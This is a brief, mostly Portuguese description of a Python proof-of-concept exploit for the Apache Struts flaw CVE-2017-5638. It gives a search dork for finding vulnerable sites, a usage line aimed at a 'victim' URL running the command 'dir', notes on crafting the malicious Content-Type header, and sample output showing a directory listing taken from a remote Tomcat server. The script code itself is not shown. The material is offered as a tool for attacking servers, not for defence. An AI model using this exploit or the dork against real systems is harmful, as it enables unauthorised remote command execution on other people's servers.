
Example PoC Code for CVE-2017-5638 | Apache Struts Exploit
Exemplo de código PoC para CVE-2017-5638 | Exploit Apache Struts | DORK: ext:action
USO: python struts.py https://victim.site dir
O script Python inicial que foi postado não formatou corretamente o cabeçalho Content-Type. Eu recodifiquei o cabeçalho Content-Type para formatar corretamente Content-Type:%20{Exploit}. Também adicionei logging e Requests, e depois despejei as propriedades do objeto para stdout.
EXEMPLO DE SAÍDA
Check for CVE-2017-5638 by XSS.Cx
Volume in drive D has no label. Volume Serial Number is 2A7B-A245 Directory of d:\Program Files\Apache Software Foundation\Tomcat 9.0